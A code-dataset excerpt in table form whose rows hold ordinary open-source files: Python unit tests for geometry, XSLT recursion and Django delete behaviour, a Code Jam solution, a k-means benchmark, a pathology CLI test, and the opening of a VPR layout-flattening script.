max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
|---|---|---|---|---|---|---|
FEM/src/test/StatisticsTest.py
|
BartSiwek/Neurotransmitter2D
| 0
|
12780051
|
<filename>FEM/src/test/StatisticsTest.py<gh_stars>0
import unittest, math
import Pslg, ElementAwarePslg
import Statistics
class ParametersTest(unittest.TestCase):
def testComputeElementAngleRange(self):
#Angle of zero
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(1,0)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 0.0 * math.pi
self.assertAlmostEquals(angle, expected, 9)
#Angle of 45 degrees
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(1,1)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 0.25 * math.pi
self.assertAlmostEquals(angle, expected, 9)
#Angle of 45 degrees
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(1,-1)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 0.25 * math.pi
self.assertAlmostEquals(angle, expected, 9)
#Angle of 90 degrees
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(0,1)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 0.5 * math.pi
self.assertAlmostEquals(angle, expected, 9)
#Angle of 90 degrees
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(0,-1)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 0.5 * math.pi
self.assertAlmostEquals(angle, expected, 9)
#Angle of 135 degrees
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(-1,1)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 0.75 * math.pi
self.assertAlmostEquals(angle, expected, 9)
#Angle of 135 degrees
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(-1,-1)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 0.75 * math.pi
self.assertAlmostEquals(angle, expected, 9)
#Angle of 180 degrees
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(-1,0)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 1.0 * math.pi
self.assertAlmostEquals(angle, expected, 9)
if __name__ == '__main__':
unittest.main()
| 2.984375
| 3
|
Round 1B/fair-fight2.py
|
enigma-pattern/GoogleCodeJam-2019
| 54
|
12780052
|
# Copyright (c) 2019 kamyu. All rights reserved.
#
# Google Code Jam 2019 Round 1B - Problem C. Fair Fight
# https://codingcompetitions.withgoogle.com/codejam/round/0000000000051706/0000000000122838
#
# Time: O(NlogN), pass in PyPy2 but Python2
# Space: O(NlogN)
#
import collections
import itertools
class RangeQuery(object):
def __init__(self, items, fn):
self.__fn = fn
self.__pow = [1]
self.__bit_length = [0]
n, count = len(items), 1
for i in xrange(1, n.bit_length()+1):
self.__pow.append(self.__pow[-1] * 2)
self.__bit_length.extend([i]*min(count, n+1-len(self.__bit_length)))
count *= 2
self.__rq = rq = [[0 for _ in xrange(n.bit_length())] for _ in xrange(n)]
for i in xrange(n):
self.__rq[i][0] = items[i]
for step in xrange(1, n.bit_length()): # Time: O(NlogN)
for i in xrange(n+1-self.__pow[step]):
self.__rq[i][step] = fn(self.__rq[i][step-1],
self.__rq[i+self.__pow[step-1]][step-1])
def query(self, start, stop): # Time: O(1)
j = self.__bit_length[stop-start]-1
x = self.__rq[start][j]
y = self.__rq[stop-self.__pow[j]][j]
return self.__fn(x, y)
def lower_bound(left, right, check):
while left <= right:
mid = left + (right-left)//2
if check(mid):
right = mid-1
else:
left = mid+1
return left
def upper_bound(left, right, check):
while left <= right:
mid = left + (right-left)//2
if not check(mid):
right = mid-1
else:
left = mid+1
return left # assert(right == left-1)
def fair_fight():
N, K = map(int, raw_input().strip().split())
C = map(int, raw_input().strip().split())
D = map(int, raw_input().strip().split())
C_RMQ, D_RMQ = RangeQuery(C, max), RangeQuery(D, max)
result, next_to_last_seen = 0, collections.defaultdict(int)
for i, (Ci, Di) in enumerate(itertools.izip(C, D)):
if Di-Ci > K: # skip impossible intervals to save time
continue
L_good = lower_bound(next_to_last_seen[Ci], i,
lambda x: C_RMQ.query(x, i+1) == Ci and D_RMQ.query(x, i+1)-Ci <= K)
R_good = upper_bound(i, N-1,
lambda x: C_RMQ.query(i, x+1) == Ci and D_RMQ.query(i, x+1)-Ci <= K)-1
L_bad = lower_bound(next_to_last_seen[Ci], i,
lambda x: C_RMQ.query(x, i+1) == Ci and D_RMQ.query(x, i+1)-Ci <= -K-1)
R_bad = upper_bound(i, N-1,
lambda x: C_RMQ.query(i, x+1) == Ci and D_RMQ.query(i, x+1)-Ci <= -K-1)-1
result += (i-L_good+1)*(R_good-i+1)-(i-L_bad+1)*(R_bad-i+1)
next_to_last_seen[Ci] = i+1 # to avoid duplicated count
return result
for case in xrange(input()):
print 'Case #%d: %s' % (case+1, fair_fight())
| 2.59375
| 3
|
kmeans/performance.py
|
numberoverzero/kmeans
| 21
|
12780053
|
"""
Utils for generating random data and comparing performance
"""
import os
import time
import pickle
import random
from kmeans import kmeans, here
here = here(__file__)
try:
range = xrange
except NameError:
pass
def timer():
start = time.clock()
return lambda: time.clock() - start
def random_points(n):
"""Returns n random [(x_1, x_2, x_3), w] tuples.
Constraints:
0 <= abs(x_N) <= 1<<8
0 <= w <= 100
x_N, w are non-negative integers
"""
rx = lambda: random.randrange(0, 1 << 8)
rw = lambda: random.randrange(1, 10)
point = lambda: [(rx(), rx(), rx()), rw()]
filename = os.path.join(here, "_perf.sample")
try:
with open(filename, 'rb') as f:
points = pickle.load(f)
except:
points = []
diff = n - len(points)
if diff > 0:
print("Cache was missing {} points".format(diff))
t = timer()
points.extend(point() for _ in range(diff))
with open(filename, 'wb') as f:
pickle.dump(points, f)
elapsed = t()
print("Added {} points to the cache ({}s)".format(diff, elapsed))
return ListProxy(points)
class ListProxy(list):
"""Fake sizes by setting length"""
def __init__(self, data):
super().__init__(data)
self.max_length = len(data)
self.length = self.max_length
@property
def length(self):
return self._length
@length.setter
def length(self, n):
if n > self.max_length:
raise ValueError(
"Maximum possible length is " + str(self.max_length))
self._length = n
def __len__(self):
return self.length
def __iter__(self):
for i in range(self.length):
yield self[i]
def main():
samples = [
# ~ Common "large" image sizes
(1920 * 1200, 3),
(1920 * 1200, 5),
(1920 * 1200, 15),
# Personal benchmarks
(747116, 5), # Unique pixels in 1920 x 1080 image
(1095169, 5), # Unique pixels in 15530 x 8591 image
# Max unique pixels in rgb 256 image
(16581375, 5)
]
max_sample = max(sample[0] for sample in samples)
print("Generating {} random points".format(max_sample))
t = timer()
points = random_points(max_sample)
elapsed = t()
print("Random points generated ({}s)".format(elapsed))
def run_test(n, k):
points.length = n
t = timer()
kmeans(points, k)
elapsed = t()
return elapsed
for n, k in samples:
print("Running test: {} points, {} centers".format(n, k))
elapsed = run_test(n, k)
print("N {:9} || K {:3} || E {}".format(n, k, elapsed))
if __name__ == "__main__":
main()
| 3.15625
| 3
|
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/dn_20020325.py
|
aleasims/Peach
| 0
|
12780054
|
# Examples from the article "Two-stage recursive algorithms in XSLT"
# By <NAME> and <NAME>
# http://www.topxml.com/xsl/articles/recurse/
from Xml.Xslt import test_harness
BOOKS = """ <book>
<title>Angela's Ashes</title>
<author><NAME></author>
<publisher>HarperCollins</publisher>
<isbn>0 00 649840 X</isbn>
<price>6.99</price>
<sales>235</sales>
</book>
<book>
<title>Sword of Honour</title>
<author><NAME></author>
<publisher>Penguin Books</publisher>
<isbn>0 14 018967 X</isbn>
<price>12.99</price>
<sales>12</sales>
</book>"""
BOOKLIST_XML = """<?xml version="1.0" encoding="utf-8"?>
<booklist>
%s
</booklist>"""
BOOKS_TOTAL = 6.99 * 235 + 12.99 * 12
# total-sales/simple.xsl
sheet_1 = """<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:template match="/">
<xsl:call-template name="sumSales1">
<xsl:with-param name="pNodes" select="/*/book"/>
</xsl:call-template>
</xsl:template>
<xsl:template name="sumSales1">
<xsl:param name="pNodes" select="/.."/>
<xsl:param name="result" select="0"/>
<xsl:choose>
<xsl:when test="$pNodes">
<xsl:call-template name="sumSales1">
<xsl:with-param name="pNodes" select="$pNodes[position()!=1]"/>
<xsl:with-param name="result" select="$result+$pNodes[1]/sales*$pNodes[1]/price"/>
</xsl:call-template>
</xsl:when>
<xsl:otherwise>
<xsl:value-of select="$result"/>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>"""
# total-sales/dvc.xsl
sheet_2 = """<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:template match="/">
<xsl:call-template name="sumSales">
<xsl:with-param name="pNodes" select="/*/book"/>
</xsl:call-template>
</xsl:template>
<xsl:template name="sumSales">
<xsl:param name="pNodes" select="/.."/>
<xsl:param name="result" select="0"/>
<xsl:variable name="vcntNodes" select="count($pNodes)"/>
<xsl:choose>
<xsl:when test="$vcntNodes = 1">
<xsl:value-of select="$result + $pNodes/sales * $pNodes/price"/>
</xsl:when>
<xsl:otherwise>
<xsl:variable name="vcntHalf" select="floor($vcntNodes div 2)"/>
<xsl:variable name="vValue1">
<xsl:call-template name="sumSales">
<xsl:with-param name="pNodes" select="$pNodes[position() <= $vcntHalf]"/>
<xsl:with-param name="result" select="$result"/>
</xsl:call-template>
</xsl:variable>
<xsl:call-template name="sumSales">
<xsl:with-param name="pNodes" select="$pNodes[position() > $vcntHalf]"/>
<xsl:with-param name="result" select="$vValue1"/>
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>"""
# total-sales/two-stage.xsl
# (with $t param added so threshold can be adjusted)
#
# The threshold is the # of elements above which DVC will be used,
# and below which recursion will be used.
#
sheet_3="""<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:param name="t" select="20"/>
<xsl:template match="/">
<xsl:call-template name="sumSales">
<xsl:with-param name="pNodes" select="/*/book"/>
<xsl:with-param name="threshold" select="$t"/>
</xsl:call-template>
</xsl:template>
<!-- DVC template: -->
<xsl:template name="sumSales">
<xsl:param name="pNodes" select="/.."/>
<xsl:param name="threshold" select="10"/>
<xsl:param name="result" select="0"/>
<xsl:variable name="vcntNodes" select="count($pNodes)"/>
<xsl:choose>
<xsl:when test="$vcntNodes <= $threshold">
<xsl:call-template name="sumSales1">
<xsl:with-param name="pNodes" select="$pNodes"/>
<xsl:with-param name="result" select="$result"/>
</xsl:call-template>
</xsl:when>
<xsl:otherwise>
<xsl:variable name="vcntHalf" select="floor($vcntNodes div 2)"/>
<xsl:variable name="vValue1">
<xsl:call-template name="sumSales">
<xsl:with-param name="pNodes" select="$pNodes[position() <= $vcntHalf]"/>
<xsl:with-param name="threshold" select="$threshold"/>
<xsl:with-param name="result" select="$result"/>
</xsl:call-template>
</xsl:variable>
<xsl:call-template name="sumSales">
<xsl:with-param name="pNodes" select="$pNodes[position() > $vcntHalf]"/>
<xsl:with-param name="threshold" select="$threshold"/>
<xsl:with-param name="result" select="$vValue1"/>
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
<!-- simple recursive template: -->
<xsl:template name="sumSales1">
<xsl:param name="pNodes" select="/.."/>
<xsl:param name="result" select="0"/>
<xsl:choose>
<xsl:when test="$pNodes">
<xsl:call-template name="sumSales1">
<xsl:with-param name="pNodes" select="$pNodes[position()!=1]"/>
<xsl:with-param name="result" select="$result+$pNodes[1]/sales*$pNodes[1]/price"/>
</xsl:call-template>
</xsl:when>
<xsl:otherwise><xsl:value-of select="$result"/></xsl:otherwise>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>"""
DIGITS = "0123456789"
DIGITS_XML = """<?xml version="1.0" encoding="utf-8"?>
<text>%s</text>"""
REVERSED_DIGITS = "9876543210"
# reverse/lrReverse.xsl
sheet_4 = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:template match="/">
<xsl:call-template name="reverse2">
<xsl:with-param name="theString" select="/*/text()"/>
</xsl:call-template>
</xsl:template>
<xsl:template name="reverse2">
<xsl:param name="theString"/>
<xsl:variable name="thisLength" select="string-length($theString)"/>
<xsl:choose>
<xsl:when test="$thisLength = 1">
<xsl:value-of select="$theString"/>
</xsl:when>
<xsl:otherwise>
<xsl:variable name="length1" select="floor($thisLength div 2)"/>
<xsl:call-template name="reverse2">
<xsl:with-param name="theString" select="substring($theString,$length1+1, $thisLength - $length1)"/>
</xsl:call-template>
<xsl:call-template name="reverse2">
<xsl:with-param name="theString" select="substring($theString, 1, $length1)"/>
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>"""
# reverse/lrReverse2.xsl
# (with $t param added so threshold can be adjusted)
#
# The threshold is the # of chars above which DVC will be used,
# and below which recursion will be used.
#
sheet_5 = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:param name="t" select="75"/>
<xsl:template match="/">
<xsl:call-template name="reverse2">
<xsl:with-param name="theString" select="/*/text()"/>
<xsl:with-param name="threshold" select="$t"/>
</xsl:call-template>
</xsl:template>
<!-- DVC template: -->
<xsl:template name="reverse2">
<xsl:param name="theString"/>
<xsl:param name="threshold" select="30"/>
<xsl:variable name="thisLength" select="string-length($theString)"/>
<xsl:choose>
<xsl:when test="$thisLength <= $threshold">
<xsl:call-template name="reverse">
<xsl:with-param name="theString" select="$theString"/>
</xsl:call-template>
</xsl:when>
<xsl:otherwise>
<xsl:variable name="length1" select="floor($thisLength div 2)"/>
<xsl:call-template name="reverse2">
<xsl:with-param name="theString" select="substring($theString,$length1+1, $thisLength - $length1)"/>
<xsl:with-param name="threshold" select="$threshold"/>
</xsl:call-template>
<xsl:call-template name="reverse2">
<xsl:with-param name="theString" select="substring($theString, 1, $length1)"/>
<xsl:with-param name="threshold" select="$threshold"/>
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
<!-- simple recursive template: -->
<xsl:template name="reverse">
<xsl:param name="theString"/>
<xsl:variable name="thisLength" select="string-length($theString)"/>
<xsl:choose>
<xsl:when test="$thisLength = 1">
<xsl:value-of select="$theString"/>
</xsl:when>
<xsl:otherwise>
<xsl:value-of select="substring($theString,$thisLength,1)"/>
<xsl:call-template name="reverse">
<xsl:with-param name="theString" select="substring($theString, 1, $thisLength -1)"/>
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>"""
GOBBLEDY = "dfd dh AAAsrter xcbxb AAAA gghmjk gfghjk ghAAAkghk dgsdfgAAA sdsdg AAA sdsdfg\n"
GOBBLEDY_XML = """<?xml version="1.0" encoding="utf-8"?>
<text>%s</text>"""
GOBBLEDY_OUT = GOBBLEDY.replace('AAA','ZZZ')
sheet_6="""<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:exsl="http://exslt.org/common">
<xsl:output method="text" encoding="iso-8859-1" />
<xsl:template match="/">
<xsl:variable name="Result">
<xsl:call-template name="lrReplace">
<xsl:with-param name="theString" select="/*/text()"/>
<xsl:with-param name="target" select="'AAA'" />
<xsl:with-param name="replacement" select="'ZZZ'" />
</xsl:call-template>
</xsl:variable>
<xsl:value-of select="$Result" />
</xsl:template>
<xsl:template name="lrReplace">
<xsl:param name="theString"/>
<xsl:param name="target"/>
<xsl:param name="replacement"/>
<xsl:variable name="lStr" select="string-length($theString)"/>
<xsl:variable name="resRTF">
<xsl:call-template name="lrReplace2">
<xsl:with-param name="theString" select="$theString"/>
<xsl:with-param name="target" select="$target"/>
<xsl:with-param name="replacement" select="$replacement"/>
</xsl:call-template>
</xsl:variable>
<xsl:variable name="resNode-set" select="exsl:node-set($resRTF)"/>
<xsl:value-of select="$resNode-set/text()"/>
<xsl:value-of select="substring($theString, $lStr - $resNode-set/u+1)" />
</xsl:template>
<xsl:template name="lrReplace2">
<xsl:param name="theString"/>
<xsl:param name="target"/>
<xsl:param name="replacement" select="''" />
<xsl:variable name="lStr" select="string-length($theString)" />
<xsl:variable name="lTarget" select="string-length($target)" />
<xsl:choose>
<xsl:when test="$lStr < $lTarget + $lTarget">
<xsl:choose>
<xsl:when
test="contains($theString,$target)">
<xsl:value-of select="substring-before($theString,$target)" />
<xsl:value-of select="$replacement" />
<u>
<xsl:value-of select="string-length(substring-after($theString,$target))" />
</u>
</xsl:when>
<xsl:otherwise>
<xsl:choose>
<xsl:when test="$lStr >= $lTarget">
<xsl:value-of select="substring($theString, 1, $lStr - $lTarget + 1)"/>
<u>
<xsl:value-of select="$lTarget - 1" />
</u>
</xsl:when>
<xsl:otherwise>
<u>
<xsl:value-of select="$lStr" />
</u>
</xsl:otherwise>
</xsl:choose>
</xsl:otherwise>
</xsl:choose>
</xsl:when>
<!-- Now the general case - theString is not less than twice the replacement -->
<xsl:otherwise>
<xsl:variable name="halfLength" select="floor($lStr div 2)"/>
<xsl:variable name="processedHalf">
<xsl:call-template name="lrReplace2">
<xsl:with-param name="theString" select="substring($theString, 1, $halfLength)"/>
<xsl:with-param name="target" select="$target"/>
<xsl:with-param name="replacement" select="$replacement"/>
</xsl:call-template>
</xsl:variable>
<xsl:variable name="nodePrHalf" select="exsl:node-set($processedHalf)"/>
<xsl:value-of select="$nodePrHalf/text()"/>
<xsl:call-template name="lrReplace2">
<xsl:with-param name="theString"
select="substring($theString, $halfLength - $nodePrHalf/u + 1)" />
<xsl:with-param name="target" select="$target" />
<xsl:with-param name="replacement" select="$replacement" />
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>"""
sheet_7="""<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:exsl="http://exslt.org/common">
<xsl:output method="text" encoding="iso-8859-1" />
<xsl:template match="/">
<xsl:variable name="Result">
<xsl:call-template name="lrReplace">
<xsl:with-param name="theString" select="/*/text()"/>
<xsl:with-param name="target" select="'AAA'"/>
<xsl:with-param name="replacement" select="'ZZZ'"/>
<xsl:with-param name="threshold" select="2000"/>
</xsl:call-template>
</xsl:variable>
<xsl:value-of select="$Result" />
</xsl:template>
<xsl:template name="lrReplace">
<xsl:param name="theString"/>
<xsl:param name="target"/>
<xsl:param name="replacement"/>
<xsl:param name="threshold" select="150"/>
<xsl:variable name="lStr" select="string-length($theString)"/>
<xsl:variable name="resRTF">
<xsl:call-template name="lrReplace2">
<xsl:with-param name="theString" select="$theString"/>
<xsl:with-param name="target" select="$target"/>
<xsl:with-param name="replacement" select="$replacement"/>
<xsl:with-param name="threshold" select="$threshold"/>
</xsl:call-template>
</xsl:variable>
<xsl:variable name="resNode-set" select="exsl:node-set($resRTF)"/>
<xsl:value-of select="$resNode-set/text()"/>
<xsl:value-of select="substring($theString, $lStr - $resNode-set/u+1)"/>
</xsl:template>
<!-- DVC template: -->
<xsl:template name="lrReplace2">
<xsl:param name="theString"/>
<xsl:param name="target"/>
<xsl:param name="replacement"/>
<xsl:param name="threshold" select="150"/>
<xsl:variable name="lStr" select="string-length($theString)"/>
<xsl:variable name="lTarget" select="string-length($target)"/>
<xsl:choose>
<xsl:when test="$lStr <= $threshold">
<xsl:call-template name="lrReplace3">
<xsl:with-param name="theString" select="$theString"/>
<xsl:with-param name="target" select="$target"/>
<xsl:with-param name="replacement" select="$replacement"/>
</xsl:call-template>
</xsl:when>
<xsl:otherwise>
<xsl:variable name="halfLength" select="floor($lStr div 2)"/>
<xsl:variable name="processedHalf">
<xsl:call-template name="lrReplace2">
<xsl:with-param name="theString" select="substring($theString, 1, $halfLength)" />
<xsl:with-param name="target" select="$target" />
<xsl:with-param name="replacement" select="$replacement"/>
<xsl:with-param name="threshold" select="$threshold"/>
</xsl:call-template>
</xsl:variable>
<xsl:variable name="nodePrHalf" select="exsl:node-set($processedHalf)"/>
<xsl:value-of select="$nodePrHalf/text()"/>
<xsl:call-template name="lrReplace2">
<xsl:with-param name="theString" select="substring($theString, $halfLength - $nodePrHalf/u + 1)"/>
<xsl:with-param name="target" select="$target"/>
<xsl:with-param name="replacement" select="$replacement"/>
<xsl:with-param name="threshold" select="$threshold" />
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
<!-- simple recursive template: -->
<xsl:template name="lrReplace3">
<xsl:param name="theString" />
<xsl:param name="target" />
<xsl:param name="replacement" />
<xsl:choose>
<xsl:when test="contains($theString, $target)">
<xsl:value-of select="substring-before($theString, $target)"/>
<xsl:value-of select="$replacement"/>
<xsl:call-template name="lrReplace3">
<xsl:with-param name="theString" select="substring-after($theString, $target)"/>
<xsl:with-param name="target" select="$target"/>
<xsl:with-param name="replacement" select="$replacement"/>
</xsl:call-template>
</xsl:when>
<xsl:otherwise>
<xsl:variable name="lStr" select="string-length($theString)"/>
<xsl:variable name="lTarget" select="string-length($target)"/>
<xsl:choose>
<xsl:when test="$lStr >= $lTarget">
<xsl:value-of select="substring($theString, 1, $lStr -$lTarget+1)" />
<u>
<xsl:value-of select="$lTarget -1"/>
</u>
</xsl:when>
<xsl:otherwise>
<u>
<xsl:value-of select="$lStr"/>
</u>
</xsl:otherwise>
</xsl:choose>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>"""
def Test(tester):
# how many repetitions of BOOKS for the shortest source doc
MULTIPLIER = 10
# how many binary orders of magnitude to go up to
EXPLIMIT = 1
sheet = test_harness.FileInfo(string=sheet_1)
for i in range(EXPLIMIT):
elements = (2 * MULTIPLIER) * 2 ** i
title = "simple recursion with %d element" % elements + "s" * (elements > 0)
source_xml = BOOKLIST_XML % ((BOOKS * MULTIPLIER) * 2 ** i)
source_1 = test_harness.FileInfo(string=source_xml)
expected_1 = str((BOOKS_TOTAL * MULTIPLIER) * 2 ** i)
test_harness.XsltTest(tester, source_1, [sheet], expected_1,
title=title)
sheet = test_harness.FileInfo(string=sheet_2)
for i in range(EXPLIMIT):
elements = (2 * MULTIPLIER) * 2 ** i
title = "divide and conquer with %d element" % elements + "s" * (elements > 0)
source_xml = BOOKLIST_XML % ((BOOKS * MULTIPLIER) * 2 ** i)
source_1 = test_harness.FileInfo(string=source_xml)
expected_1 = str((BOOKS_TOTAL * MULTIPLIER) * 2 ** i)
test_harness.XsltTest(tester, source_1, [sheet], expected_1,
title=title)
sheet = test_harness.FileInfo(string=sheet_3)
for i in range(EXPLIMIT):
threshold = 8 # seems to be best as of 2003-03-23
elements = (2 * MULTIPLIER) * 2 ** i
title = "2-stage divide and conquer with %d element" % elements + "s" * (elements > 0)
title += " (threshold=%d)" % threshold
source_xml = BOOKLIST_XML % ((BOOKS * MULTIPLIER) * 2 ** i)
source_1 = test_harness.FileInfo(string=source_xml)
expected_1 = str((BOOKS_TOTAL * MULTIPLIER) * 2 ** i)
test_harness.XsltTest(tester, source_1, [sheet], expected_1,
title=title,
topLevelParams={'t': threshold})
sheet = test_harness.FileInfo(string=sheet_4)
for i in range(EXPLIMIT):
chars = 1000 * 2 ** i
title = "divide and conquer reversal of %d-char string" % chars
source_xml = DIGITS_XML % ((DIGITS * 100) * 2 ** i)
source_1 = test_harness.FileInfo(string=source_xml)
expected_1 = (REVERSED_DIGITS * 100) * 2 ** i
test_harness.XsltTest(tester, source_1, [sheet], expected_1,
title=title)
sheet = test_harness.FileInfo(string=sheet_5)
for i in range(EXPLIMIT):
threshold = 75
chars = 1000 * 2 ** i
title = "2-stage divide and conquer reversal of %d-char string" % chars
title += " (threshold=%d)" % threshold
source_xml = DIGITS_XML % ((DIGITS * 100) * 2 ** i)
source_1 = test_harness.FileInfo(string=source_xml)
expected_1 = (REVERSED_DIGITS * 100) * 2 ** i
test_harness.XsltTest(tester, source_1, [sheet], expected_1,
title=title,
topLevelParams={'t': threshold})
sheet = test_harness.FileInfo(string=sheet_6)
for i in range(EXPLIMIT):
chars = (len(GOBBLEDY) * 20) * 2 ** i
title = "divide and conquer search/replace on %d-char string" % chars
source_xml = GOBBLEDY_XML % ((GOBBLEDY * 20) * 2 ** i)
source_1 = test_harness.FileInfo(string=source_xml)
expected_1 = (GOBBLEDY_OUT * 20) * 2 ** i
test_harness.XsltTest(tester, source_1, [sheet], expected_1,
title=title)
sheet = test_harness.FileInfo(string=sheet_7)
for i in range(EXPLIMIT):
chars = (len(GOBBLEDY) * 20) * 2 ** i
title = "2-stage divide and conquer search/replace on %d-char string" % chars
source_xml = GOBBLEDY_XML % ((GOBBLEDY * 20) * 2 ** i)
source_1 = test_harness.FileInfo(string=source_xml)
expected_1 = (GOBBLEDY_OUT * 20) * 2 ** i
test_harness.XsltTest(tester, source_1, [sheet], expected_1,
title=title)
return
| 3.453125
| 3
|
tests/test_soft_and_hard_deletes.py
|
Bilonan/django-binder
| 14
|
12780055
|
<reponame>Bilonan/django-binder
from django.test import TestCase, Client
from django.contrib.auth.models import User
from binder.json import jsonloads
from .testapp.models import Animal, Costume, Caretaker
class DeleteTest(TestCase):
def setUp(self):
super().setUp()
u = User(username='testuser', is_active=True, is_superuser=True)
u.set_password('<PASSWORD>')
u.save()
self.client = Client()
r = self.client.login(username='testuser', password='<PASSWORD>')
self.assertTrue(r)
def test_non_soft_deletable_model_is_hard_deleted_on_delete_verb(self):
donald = Animal(name='Donald Duck')
donald.save()
sailor = Costume(description='Weird sailor costume', animal=donald)
sailor.save()
response = self.client.delete('/costume/%d/' % sailor.pk)
self.assertEqual(response.status_code, 204)
self.assertEqual('', response.content.decode())
self.assertFalse(Costume.objects.exists())
def test_soft_deletable_model_is_softdeleted_on_delete_verb(self):
donald = Animal(name='Donald Duck')
donald.save()
self.assertFalse(donald.deleted)
response = self.client.delete('/animal/%d/' % donald.id)
self.assertEqual(response.status_code, 204)
self.assertEqual('', response.content.decode())
donald.refresh_from_db()
self.assertTrue(donald.deleted)
def test_soft_deletable_model_is_undeleted_on_post(self):
donald = Animal(name='Donald Duck', deleted=True)
donald.save()
self.assertTrue(donald.deleted)
# Body must be empty, otherwise we get an error
response = self.client.post('/animal/%d/' % donald.id, data='{"name": "<NAME>"}', content_type='application/json')
self.assertEqual(response.status_code, 418)
response = self.client.post('/animal/%d/' % donald.id, data='{}', content_type='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual('', response.content.decode())
donald.refresh_from_db()
self.assertFalse(donald.deleted)
def test_hard_deletable_model_raises_validation_error_on_cascaded_delete_failure(self):
walt = Caretaker(name='<NAME>')
walt.save()
donald = Animal(name='<NAME>', caretaker=walt)
donald.save()
# Body must be empty, otherwise we get another error
response = self.client.delete('/caretaker/%d/' % walt.id)
self.assertEqual(response.status_code, 400)
returned_data = jsonloads(response.content)
self.assertEqual(returned_data['code'], 'ValidationError')
self.assertEqual(len(returned_data['errors']), 1)
self.assertEqual(len(returned_data['errors']['caretaker']), 1)
self.assertEqual(len(returned_data['errors']['caretaker'][str(walt.id)]), 1)
self.assertEqual(len(returned_data['errors']['caretaker'][str(walt.id)]['id']), 1)
self.assertEqual(returned_data['errors']['caretaker'][str(walt.id)]['id'][0]['code'], 'protected')
self.assertIn('message', returned_data['errors']['caretaker'][str(walt.id)]['id'][0])
self.assertIn('objects', returned_data['errors']['caretaker'][str(walt.id)]['id'][0])
self.assertEqual({'animal': [donald.id]}, returned_data['errors']['caretaker'][str(walt.id)]['id'][0]['objects'])
walt.refresh_from_db() # Should not fail
donald.refresh_from_db()
self.assertFalse(donald.deleted)
| 2.28125
| 2
|
pyluna-pathology/tests/luna/pathology/cli/test_infer_tile_labels.py
|
msk-mind/luna
| 1
|
12780056
|
from click.testing import CliRunner
from luna.pathology.cli.infer_tile_labels import cli
def test_cli(tmp_path):
runner = CliRunner()
result = runner.invoke(cli, [
'pyluna-pathology/tests/luna/pathology/cli/testdata/data/test/slides/123/test_generate_tile_ov_labels/TileImages/data/',
'-o', tmp_path,
'-rn', 'msk-mind/luna-ml',
'-tn', 'tissue_tile_net_transform',
'-mn', 'tissue_tile_net_model_5_class',
'-wt', 'main:tissue_net_2021-01-19_21.05.24-e17.pth',
])
# No longer error gracefully -- can update tests with proper data and they'll work
assert result.exit_code == 1
| 2
| 2
|
utils/symbiflow/scripts/flatten_layout.py
|
QuickLogic-Corp/qlfpga-symbiflow-plugins
| 0
|
12780057
|
<gh_stars>0
#!/usr/bin/env python3
"""
This script loads VPR architecture definition and flattens all layouts defined
there so that they only consist of <single> tags. Tiles of the flattened
layouts can have individual metadata (FASM prefixes) assigned.
The FASM prefix pattern is provided with the --fasm_prefix parameter. The
pattern string may contain tag references that are replaced with tile specific
data. Tags have to be provided in curly brackets. The recoginzed tags are:
- 'tile' : tile type name
- 'sub_tile' : Sub-tile type name
- 'x' : X locatin in the VPR grid
- 'y' : Y locatin in the VPR grid
- 'z' : Z locatin in the VPR grid (cumulated sub-tile index)
- 'i' : Sub-tile index
